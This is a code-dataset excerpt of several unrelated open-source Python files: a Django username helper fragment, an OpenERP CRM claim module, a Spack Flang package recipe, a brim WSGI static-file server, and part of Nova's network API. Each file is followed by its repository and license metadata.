s2 = ''.join([choice(string.digits) for i in range(8)])
test_name = u'%s%s' % (s1,s2)
try:
User.objects.get(username=test_name)
except:
valid_id = True
return test_name
|
pocketone/django-shoppy
|
shoppy/util/randomuserid.py
|
Python
|
bsd-3-clause
| 499
| 0.012024
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp import models, fields, api
from openerp.addons.crm import crm
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
from openerp.tools import html2plaintext
from datetime import datetime, timedelta
import logging
_logger = logging.getLogger(__name__)
AVAILABLE_ACTIONS = [
('correction','Corrective Action'),
('prevention','Preventive Action'),
('replace','Replace Action'), # New option
('discard','Discard Action'), # New option
]
class crm_claim(osv.osv):
_name = "crm.claim"
_inherit = "crm.claim"
_columns = {
'origin': fields.char('Origin',size=30,readonly=True),
'products_id': fields.many2many('product.product', 'crm_claim_products', 'crm_claim_id', 'product_id', 'Productos', track_visibility='onchange'),
'has_check_solution': fields.boolean('has check soluction',readonly=True),
'type_action': fields.selection(AVAILABLE_ACTIONS, 'Action Type',readonly=True), # Override required and selections
'type_id': fields.many2one('crm.claim.type', 'Type'),
#'product_id' : fields.Many2one('product.product'),
#'ref': fields.reference('Reference', selection=openerp.addons.base.res.res_request.referencable_models),
}
_defaults = {
'origin': lambda self, cr, uid, context: 'self',
}
def create(self, cr, uid, vals, context=None):
if not 'number_id' in vals or vals['number_id'] == '/':
if not 'origin' in vals :
vals['origin'] = 'self'
vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
#vals['number_id'] = vals['origin'] + str(self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'))
return super(crm_claim, self).create(cr, uid, vals, context)
def write(self, cr, uid, ids, vals, context=None):
if 'stage_id' in vals:
clm_stg = self.pool.get('crm.claim.stage')
stage=clm_stg.read(cr, uid, vals['stage_id'], ['user_id','day_to_action_next','action_next','days_to_date_deadline'])
if 'action_next' in stage and stage['action_next']:
vals['action_next']=stage['action_next']
vals['date_action_next']=datetime.today()+timedelta(days=int(stage['day_to_action_next']))
vals['user_id']=stage['user_id'][0]
if 'days_to_date_deadline' in stage and stage['days_to_date_deadline']:
vals['date_deadline']=datetime.today()+timedelta(days=int(stage['days_to_date_deadline']))
return super(crm_claim, self).write(cr, uid, ids, vals, context=context)
def copy(self, cr, uid, _id, default={}, context=None):
default.update({
'number_id': self.pool.get('ir.sequence').get(cr, uid, 'crm.claim'),
})
return super(crm_claim, self).copy(cr, uid, _id, default, context)
crm_claim()
class crm_claim_stage(osv.osv):
_name = "crm.claim.stage"
_inherit = "crm.claim.stage"
_columns = {
'user_id': fields.many2one('res.users', 'Responsible', track_visibility='always'),
'day_to_action_next': fields.integer('Days to next action'),
'action_next': fields.char('Next Action'),
'days_to_date_deadline': fields.char('Date to deadline'),
}
_defaults = {
'day_next_action': lambda self, cr, uid, context: '7',
}
crm_claim_stage()
class crm_claim_type(osv.osv):
""" Type of Claim """
_name = "crm.claim.type"
_description = "Type of Claim"
_columns = {
'name': fields.char('Name', required=True, translate=True),
'parent_id': fields.many2one('crm.claim.type', 'Type of claim', required=False, ondelete='cascade',
help="Claim type."),
}
"""def _find_object_id(self, cr, uid, context=None):
context = context or {}
object_id = context.get('object_id', False)
ids = self.pool.get('ir.model').search(cr, uid, ['|', ('id', '=', object_id), ('model', '=', context.get('object_name', False))])
return ids and ids[0] or False
_defaults = {
'object_id': _find_object_id
}"""
class claim_from_invoice(osv.osv_memory):
_name = 'claim.from.invoice'
_description = 'claim from invoice'
_columns = {
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
}
def claim_from_invoice(self, cr, uid, ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
class view_account_invoice_claims(osv.osv):
_name = "view.account.invoice.claims"
_description = "Claim by account invoice"
_auto = False
_columns = {
'id': fields.integer('ID', readonly=True),
'invoice_id': fields.many2one('account.invoice', 'Invoice'),
'partner_id': fields.many2one('res.partner', 'Partner'),
'number': fields.char('number'),
'name': fields.char('name'),
'claim_id': fields.many2one('crm.claim', 'Claim'),
'crm_claim_name': fields.char('Subject'),
'invoice_line' : fields.one2many('account.invoice.line', 'invoice_id', string='Invoice Lines'),
#'invoice_line_text_line':fields.function('get_text_lines', store=False,relation='view.account.invoice.claims' ,
# method=True, string='lines',type='char')
'invoice_line_text': fields.char(compute='_get_text_lines' ,store=False, string="Productos"),
}
@api.depends('invoice_line_text','invoice_line')
def _get_text_lines(self):
_logger.info("filoquin ----- self : %r", self)
for record in self:
record.invoice_line_text ='sada'
def prueba(self, cr, uid,ids, context=None):
_logger.info("filoquin ----- ids : %r", ids)
_logger.info("filoquin ----- context : %r", context)
def _get_default_warehouse(self, cr, uid, context=None):
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
company_id = user.company_id.id
wh_obj = self.pool.get('stock.warehouse')
wh_ids = wh_obj.search(cr, uid,
[('company_id', '=', company_id)],
context=context)
if not wh_ids:
raise orm.except_orm(
_('Error!'),
_('There is no warehouse for the current user\'s company.'))
return wh_ids[0]
def create(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- create : %r", vals)
#newclaim=self.newclaim( cr, uid, [vals['invoice_id']], context=None)
_logger.info("filoquin ----- newclaim : %r", newclaim)
pass
def write(self, cr, uid, vals, context=None):
_logger.info("filoquin ----- write : %r", vals)
pass
def newclaim(self, cr, uid, ids, context=None):
res_invoice_id = ids[0]
claims = self.pool.get('crm.claim').search(cr,uid,
[('invoice_id', '=', res_invoice_id)],
context=context)
if claims :
return self.open_claim(cr, uid, claims[0], context=context)
user_obj = self.pool.get('res.users')
user = user_obj.browse(cr, uid, uid, context=context)
invoice = self.pool.get('account.invoice').browse(cr, uid, res_invoice_id, context=context)
new_claim={'invoice_id': res_invoice_id,
'number_id' : '/',
'partner_id': invoice.partner_id.id,
'email_from': invoice.partner_id.email,
'partner_phone': invoice.partner_id.phone,
'claim_type': 'customer',
'company_id': user.company_id.id,
'name': 'prueba ' }
claim_line_ids=self.add_lines(cr, uid,res_invoice_id, new_claim['claim_type'],datetime.now,
new_claim['company_id'],context=context)
new_claim['claim_line_ids']=[(6,0,claim_line_ids)]
return_id = self.pool.get('crm.claim').create(cr,uid,new_claim)
return self.open_claim(cr, uid, return_id, context=context)
def add_lines(self,cr, uid, invoice_id, claim_type, claim_date, company_id, context=None):
invoice_line_obj = self.pool.get('account.invoice.line')
invoice_obj = self.pool.get('account.invoice')
product_obj = self.pool['product.product']
claim_line_obj = self.pool.get('claim.line')
company_obj = self.pool['res.company']
warehouse_obj = self.pool['stock.warehouse']
invoice_line_ids = invoice_line_obj.search(
cr, uid,
[('invoice_id', '=', invoice_id)],
context=context)
claim_lines = []
value = {}
warehouse_id = self._get_default_warehouse(cr, uid,
context=context)
invoice_lines = invoice_line_obj.browse(cr, uid, invoice_line_ids,
context=context)
def warranty_values(invoice, product):
values = {}
try:
warranty = claim_line_obj._warranty_limit_values(
cr, uid, [], invoice,
claim_type, product,
claim_date, context=context)
except (InvoiceNoDate, ProductNoSupplier):
# we don't mind at this point if the warranty can't be
# computed and we don't want to block the user
values.update({'guarantee_limit': False, 'warning': False})
else:
values.update(warranty)
company = company_obj.browse(cr, uid, company_id, context=context)
warehouse = warehouse_obj.browse(cr, uid, warehouse_id,
context=context)
warranty_address = claim_line_obj._warranty_return_address_values(
cr, uid, [], product, company,
warehouse, context=context)
values.update(warranty_address)
return values
for invoice_line in invoice_lines:
location_dest_id = claim_line_obj.get_destination_location(
cr, uid, invoice_line.product_id.id,
warehouse_id, context=context)
line = {
'name': invoice_line.name,
'claim_origine': "none",
'invoice_line_id': invoice_line.id,
'product_id': invoice_line.product_id.id,
'product_returned_quantity': invoice_line.quantity,
'unit_sale_price': invoice_line.price_unit,
'location_dest_id': location_dest_id,
'state': 'draft',
}
line.update(warranty_values(invoice_line.invoice_id,invoice_line.product_id))
line_id=self.pool.get('claim.line').create(cr, uid,line)
claim_lines.append(line_id)
return claim_lines;
def open_claim(self, cr, uid, claim_id, context=None):
ir_model_data = self.pool.get('ir.model.data')
form_res = ir_model_data.get_object_reference(cr, uid, 'crm_claim', 'crm_case_claims_form_view')
form_id = form_res and form_res[1] or False
tree_res = ir_model_data.get_object_reference(cr, uid, 'crm_claim', 'crm_case_claims_tree_view')
tree_id = tree_res and tree_res[1] or False
return {
'name': _('Invoice Claim'),
'view_type': 'form',
'view_mode': 'form,tree',
'res_model': 'crm.claim',
'res_id': claim_id,
'view_id': False,
'target' : 'inline',
'views': [(form_id, 'form'), (tree_id, 'tree')],
'type': 'ir.actions.act_window',
}
def view_account_invoice_claims(self, cr, uid, ids, context=None):
invoice_ids = context['active_ids']
_logger.info("filoquin ----- domain : %r", invoice_ids)
if len(invoice_ids) == 0:
raise osv.except_osv(_('Error!'), _("You should select at least one invoice!!!"))
return {'type': 'ir.actions.act_window_close'}
res_invoice = self.read(cr,uid,ids,['id'])
if not res_invoice[0]['invoice_id']:
raise osv.except_osv(_('Error!'), _("You should select at least one invoice!!!"))
return {'type': 'ir.actions.act_window_close'}
res_invoice_id = res_invoice[0]['invoice_id'][0]
invoice = self.pool.get('account.invoice').browse(cr, uid, res_invoice_id, context=context)
new_claim={'invoice_id': res_invoice_id,
'partner_id': invoice.partner_id.id,
'email_from': invoice.partner_id.email,
'partner_phone': invoice.partner_id.phone}
return_id = self.pool.get('crm.claim').write(cr,uid,invoice_ids,new_claim)
return {}
def init(self, cr):
tools.sql.drop_view_if_exists(cr, 'view_account_invoice_claims')
cr.execute("""
create or replace view view_account_invoice_claims as (
select ai.id,ai.id as invoice_id, ai.partner_id , ai.number , ai.name ,cl.id as claim_id, cl.name as crm_claim_name ,
'-' as invoice_line_text
from account_invoice ai
left join crm_claim cl on (ai.id=cl.invoice_id)
)
""")
|
blancoamor/crm_rma_blancoamor
|
crm_rma_blancoamor.py
|
Python
|
agpl-3.0
| 14,539
| 0.008941
|
##############################################################################
# Copyright (c) 2017, Los Alamos National Security, LLC
# Produced at the Los Alamos National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Flang(CMakePackage):
"""Flang is a Fortran compiler targeting LLVM."""
homepage = "https://github.com/flang-compiler/flang"
url = "https://github.com/flang-compiler/flang/archive/flang_20180612.tar.gz"
git = "https://github.com/flang-compiler/flang.git"
version('develop', branch='master')
version('20180612', '62284e26214eaaff261a922c67f6878c')
depends_on('llvm@flang-develop', when='@develop')
depends_on('llvm@flang-20180612', when='@20180612 target=x86_64')
# LLVM version specific to OpenPOWER.
depends_on('llvm@flang-ppc64le-20180612', when='@20180612 target=ppc64le')
depends_on('pgmath@develop', when='@develop')
depends_on('pgmath@20180612', when='@20180612')
def cmake_args(self):
options = [
'-DWITH_WERROR=OFF',
'-DCMAKE_C_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang'),
'-DCMAKE_CXX_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang++'),
'-DCMAKE_Fortran_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'flang'),
'-DFLANG_LIBOMP=%s' % find_libraries(
'libomp', root=self.spec['llvm'].prefix.lib)
]
return options
@run_after('install')
def post_install(self):
# we are installing flang in a path different from llvm, so we
# create a wrapper with -L for e.g. libflangrti.so and -I for
# e.g. iso_c_binding.mod. -B is needed to help flang to find
# flang1 and flang2. rpath_arg is needed so that executables
# generated by flang can find libflang later.
flang = os.path.join(self.spec.prefix.bin, 'flang')
with open(flang, 'w') as out:
out.write('#!/bin/bash\n')
out.write(
'{0} -I{1} -L{2} -L{3} {4}{5} {6}{7} -B{8} "$@"\n'.format(
self.spec['llvm'].prefix.bin.flang,
self.prefix.include, self.prefix.lib,
self.spec['pgmath'].prefix.lib,
self.compiler.fc_rpath_arg, self.prefix.lib,
self.compiler.fc_rpath_arg,
self.spec['pgmath'].prefix.lib, self.spec.prefix.bin))
out.close()
chmod = which('chmod')
chmod('+x', flang)
def setup_environment(self, spack_env, run_env):
# to find llvm's libc++.so
spack_env.set('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
run_env.set('FC', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F77', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F90', join_path(self.spec.prefix.bin, 'flang'))
|
krafczyk/spack
|
var/spack/repos/builtin/packages/flang/package.py
|
Python
|
lgpl-2.1
| 3,969
| 0.000756
|
"""A WSGI application that simply serves up files from the file system.
.. warning::
This is an early version of this module. It has no tests, limited
documentation, and is subject to major changes.
Configuration Options::
[wsgi_fs]
call = brim.wsgi_fs.WSGIFS
# path = <path>
# The request path to match and serve; any paths that do not begin
# with this value will be passed on to the next WSGI app in the
# chain. Default: /
# serve_path = <path>
# The local file path containing files to serve.
"""
"""Copyright and License.
Copyright 2014 Gregory Holt
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mimetypes
import os
import time
from cgi import escape
from brim import http
MONTH_ABR = (
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',
'Nov', 'Dec')
WEEKDAY_ABR = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')
def http_date_time(when):
"""Returns a date and time formatted as per HTTP RFC 2616."""
gmtime = time.gmtime(when)
return '%s, %02d %3s %4d %02d:%02d:%02d GMT' % (
WEEKDAY_ABR[gmtime.tm_wday], gmtime.tm_mday,
MONTH_ABR[gmtime.tm_mon - 1], gmtime.tm_year, gmtime.tm_hour,
gmtime.tm_min, gmtime.tm_sec)
def _openiter(path, chunk_size, total_size):
left = total_size
with open(path, 'rb') as source:
while True:
chunk = source.read(min(chunk_size, left))
if not chunk:
break
left -= len(chunk)
yield chunk
if left >= chunk_size:
chunk = ' ' * chunk_size
while left >= chunk_size:
left -= chunk_size
yield chunk
if left:
yield ' ' * left
class WSGIFS(object):
"""A WSGI app for serving up files from the file system.
See :py:mod:`brim.wsgi_fs` for more information.
:param name: The name of the app.
:param parsed_conf: The conf result from :py:meth:`parse_conf`.
:param next_app: The next WSGI app in the chain.
"""
def __init__(self, name, parsed_conf, next_app):
self.name = name
"""The name of the app."""
self.next_app = next_app
"""The next WSGI app in the chain."""
self.path = parsed_conf['path']
"""The request path to match and serve.
Any paths that do not begin with this value will be passed on to
the next WSGI app in the chain. The attribute will have leading
and trailing foward slashes removed.
"""
self.serve_path = parsed_conf['serve_path']
"""The local file path containing files to serve."""
def __call__(self, env, start_response):
"""Handles incoming WSGI requests.
Requests that start with the configured path simply serve up any
files under the configured location on the file system. Other
requests are passed on to the next WSGI app in the chain.
:param env: The WSGI env as per the spec.
:param start_response: The WSGI start_response as per the spec.
:returns: Calls *start_response* and returns an iterable as per
the WSGI spec.
"""
path = os.path.normpath(env['PATH_INFO'].strip('/'))
if path == self.path:
path = '.'
elif path.startswith(self.path + '/'):
path = path[len(self.path) + 1:]
if not path:
path = '.'
elif self.path:
return self.next_app(env, start_response)
if path == '..' or path.startswith('..' + os.path.sep):
return http.HTTPForbidden()(env, start_response)
path = os.path.join(self.serve_path, path)
if not os.path.exists(path):
return http.HTTPNotFound()(env, start_response)
if os.path.isdir(path):
if not env['PATH_INFO'].endswith('/'):
return http.HTTPMovedPermanently(
headers={'Location': env['PATH_INFO'] + '/'})(
env, start_response)
dirpath = path
path = os.path.join(path, 'index.html')
if not os.path.exists(path):
return self.listing(dirpath, env, start_response)
content_type = mimetypes.guess_type(path)[0] or \
'application/octet-stream'
stat = os.stat(path)
if not stat.st_size:
start_response(
'204 No Content',
[('Content-Length', '0'), ('Content-Type', content_type)])
start_response(
'200 OK',
[('Content-Length', str(stat.st_size)),
('Content-Type', content_type),
('Last-Modified',
http_date_time(min(stat.st_mtime, time.time())))])
if env['REQUEST_METHOD'] == 'HEAD':
return ''
return _openiter(path, 65536, stat.st_size)
def listing(self, path, env, start_response):
if not path.startswith(self.serve_path + '/'):
return http.HTTPForbidden()(env, start_response)
rpath = '/' + self.path + '/' + path[len(self.serve_path) + 1:]
epath = escape(rpath)
body = (
'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 '
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n'
'<html>\n'
' <head>\n'
' <title>Listing of %s</title>\n'
' <style type="text/css">\n'
' h1 {font-size: 1em; font-weight: bold;}\n'
' th {text-align: left; padding: 0px 1em 0px 1em;}\n'
' td {padding: 0px 1em 0px 1em;}\n'
' a {text-decoration: none;}\n'
' .colsize {text-align: right;}\n'
' </style>\n'
' </head>\n'
' <body>\n'
' <h1 id="title">Listing of %s</h1>\n'
' <table id="listing">\n'
' <tr id="heading">\n'
' <th class="colname">Name</th>\n'
' <th class="colsize">Size</th>\n'
' <th class="coldate">Date</th>\n'
' </tr>\n' % (epath, epath))
if env['PATH_INFO'].count('/') > 1:
body += (
' <tr id="parent" class="item">\n'
' <td class="colname"><a href="../">../</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n')
listing = sorted(os.listdir(path))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isdir(itempath):
body += (
' <tr class="item subdir">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n' % (http.quote(item), escape(item)))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isfile(itempath):
ext = os.path.splitext(item)[1].lstrip('.')
size = os.path.getsize(itempath)
mtime = os.path.getmtime(itempath)
body += (
' <tr class="item %s">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize">'
'<script type="text/javascript">'
'document.write(new Number(%s).toLocaleString());'
'</script></td>\n'
' <td class="coldate">'
'<script type="text/javascript">'
'document.write(new Date(%s * 1000).toLocaleString());'
'</script></td>\n'
' </tr>\n' %
('ext' + ext, http.quote(item), escape(item), size, mtime))
body += (
' </table>\n'
' </body>\n'
'</html>\n')
start_response('200 OK', {
'content-type': 'text/html; charset=UTF-8',
'content-length': str(len(body))}.items())
return [body]
@classmethod
def parse_conf(cls, name, conf):
"""Translates the overall server configuration.
The conf is translated into an app-specific configuration dict
suitable for passing as ``parsed_conf`` in the
:py:class:`WSGIFS` constructor.
See the overall docs of :py:mod:`brim.wsgi_fs` for
configuration options.
:param name: The name of the app, indicates the app's section in
the overall configuration for the server.
:param conf: The :py:class:`brim.conf.Conf` instance
representing the overall configuration of the server.
:returns: A dict suitable for passing as ``parsed_conf`` in the
:py:class:`WSGIFS` constructor.
"""
parsed_conf = {
'path': conf.get(name, 'path', '/').strip('/'),
'serve_path': conf.get_path(name, 'serve_path').rstrip('/')}
if not parsed_conf['serve_path']:
raise Exception('[%s] serve_path must be set' % name)
return parsed_conf
|
gholt/python-brim
|
brim/wsgi_fs.py
|
Python
|
apache-2.0
| 9,657
| 0.000518
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo.config import cfg
from nova.compute import flavors
from nova import exception
from nova.i18n import _
from nova.network import base_api
from nova.network import floating_ips
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import log as logging
from nova import policy
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution."""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
policy.enforce(context, _action, target)
class API(base_api.NetworkAPI):
"""API for doing networking via the nova-network network manager.
This is a pluggable module - other implementations do networking via
other services (such as Neutron).
"""
def __init__(self, **kwargs):
self.network_rpcapi = network_rpcapi.NetworkAPI()
helper = utils.ExceptionHelper
# NOTE(vish): this local version of floating_manager has to convert
# ClientExceptions back since they aren't going over rpc.
self.floating_manager = helper(floating_ips.LocalManager())
super(API, self).__init__(**kwargs)
@wrap_check_policy
def get_all(self, context):
"""Get all the networks.
If it is an admin user then api will return all the
networks. If it is a normal user and nova Flat or FlatDHCP
networking is being used then api will return all
networks. Otherwise api will only return the networks which
belong to the user's project.
"""
if "nova.network.manager.Flat" in CONF.network_manager:
project_only = "allow_none"
else:
project_only = True
try:
return objects.NetworkList.get_all(context,
project_only=project_only)
except exception.NoNetworksFound:
return []
@wrap_check_policy
def get(self, context, network_uuid):
return objects.Network.get_by_uuid(context.elevated(), network_uuid)
@wrap_check_policy
def create(self, context, **kwargs):
return self.network_rpcapi.create_networks(context, **kwargs)
@wrap_check_policy
def delete(self, context, network_uuid):
return self.network_rpcapi.delete_network(context, network_uuid, None)
@wrap_check_policy
def disassociate(self, context, network_uuid):
network = self.get(context, network_uuid)
objects.Network.disassociate(context, network.id,
host=True, project=True)
@wrap_check_policy
def get_fixed_ip(self, context, id):
return objects.FixedIP.get_by_id(context, id)
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
return objects.FixedIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ip(self, context, id):
if not utils.is_int_like(id):
raise exception.InvalidID(id=id)
return objects.FloatingIP.get_by_id(context, id)
@wrap_check_policy
def get_floating_ip_pools(self, context):
return objects.FloatingIP.get_pool_names(context)
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
return objects.FloatingIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ips_by_project(self, context):
return objects.FloatingIPList.get_by_project(context,
context.project_id)
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
floating_ips = objects.FloatingIPList.get_by_fixed_address(
context, fixed_address)
return [str(floating_ip.address) for floating_ip in floating_ips]
@wrap_check_policy
def get_instance_id_by_floating_address(self, context, address):
fixed_ip = objects.FixedIP.get_by_floating_address(context, address)
if fixed_ip is None:
return None
else:
return fixed_ip.instance_uuid
@wrap_check_policy
def get_vifs_by_instance(self, context, instance):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance.uuid)
for vif in vifs:
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vifs
@wrap_check_policy
def get_vif_by_mac_address(self, context, mac_address):
vif = objects.VirtualInterface.get_by_address(context,
mac_address)
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vif
@wrap_check_policy
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocates) a floating ip to a project from a pool."""
return self.floating_manager.allocate_floating_ip(context,
context.project_id, False, pool)
@wrap_check_policy
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
return self.floating_manager.deallocate_floating_ip(context, address,
affect_auto_assigned)
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip.
This api call was added to allow this to be done in one operation
if using neutron.
"""
address = floating_ip['address']
if floating_ip.get('fixed_ip_id'):
try:
self.disassociate_floating_ip(context, instance, address)
except exception.FloatingIpNotAssociated:
msg = ("Floating ip %s has already been disassociated, "
"perhaps by another concurrent action.") % address
LOG.debug(msg)
# release ip from project
return self.release_floating_ip(context, address)
@wrap_check_policy
@base_api.refresh_cache
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Ensures floating ip is allocated to the project in context.
Does not verify ownership of the fixed ip. Caller is assumed to have
checked that the instance is properly owned.
"""
orig_instance_uuid = self.floating_manager.associate_floating_ip(
context, floating_address, fixed_address, affect_auto_assigned)
if orig_instance_uuid:
msg_dict = dict(address=floating_address,
instance_id=orig_instance_uuid)
LOG.info(_('re-assign floating IP %(address)s from '
'instance %(instance_id)s') % msg_dict)
orig_instance = objects.Instance.get_by_uuid(context,
orig_instance_uuid)
# purge cached nw info for the original instance
base_api.update_instance_cache_with_nw_info(self, context,
orig_instance)
@wrap_check_policy
@base_api.refresh_cache
def disassociate_floating_ip(self, context, instance, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from fixed ip it is associated with."""
return self.floating_manager.disassociate_floating_ip(context, address,
affect_auto_assigned)
@wrap_check_policy
@base_api.refresh_cache
def allocate_for_instance(self, context, instance, vpn,
requested_networks, macs=None,
security_groups=None,
dhcp_options=None):
"""Allocates all network structures for an instance.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param vpn: A boolean, if True, indicate a vpn to access the instance.
:param requested_networks: A dictionary of requested_networks,
Optional value containing network_id, fixed_ip, and port_id.
:param macs: None or a set of MAC addresses that the instance
should use. macs is supplied by the hypervisor driver (contrast
with requested_networks which is user supplied).
:param security_groups: None or security groups to allocate for
instance.
:param dhcp_options: None or a set of key/value pairs that should
determine the DHCP BOOTP response, eg. for PXE booting an instance
configured with the baremetal hypervisor. It is expected that these
are already formatted for the neutron v2 api.
See nova/virt/driver.py:dhcp_options_for_instance for an example.
:returns: network info as from get_instance_nw_info() below
"""
# NOTE(vish): We can't do the floating ip allocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
flavor = flavors.extract_flavor(instance)
args = {}
args['vpn'] = vpn
args['requested_networks'] = requested_networks
args['instance_id'] = instance.uuid
args['project_id'] = instance.project_id
args['host'] = instance.host
args['rxtx_factor'] = flavor['rxtx_factor']
args['macs'] = macs
args['dhcp_options'] = dhcp_options
nw_info = self.network_rpcapi.allocate_for_instance(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def deallocate_for_instance(self, context, instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
# NOTE(vish): We can't do the floating ip deallocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
if not isinstance(instance, obj_base.NovaObject):
instance = objects.Instance._from_db_object(context,
objects.Instance(), instance)
self.network_rpcapi.deallocate_for_instance(context, instance=instance,
requested_networks=requested_networks)
# NOTE(danms): Here for neutron compatibility
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def deallocate_port_for_instance(self, context, instance, port_id):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def list_ports(self, *args, **kwargs):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def show_port(self, *args, **kwargs):
raise NotImplementedError()
@wrap_check_policy
@base_api.refresh_cache
def add_fixed_ip_to_instance(self, context, instance, network_id):
"""Adds a fixed ip to instance from specified network."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'network_id': network_id}
nw_info = self.network_rpcapi.add_fixed_ip_to_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
@base_api.refresh_cache
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'address': address}
nw_info = self.network_rpcapi.remove_fixed_ip_from_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
self.network_rpcapi.add_network_to_project(context, project_id,
network_uuid)
@wrap_check_policy
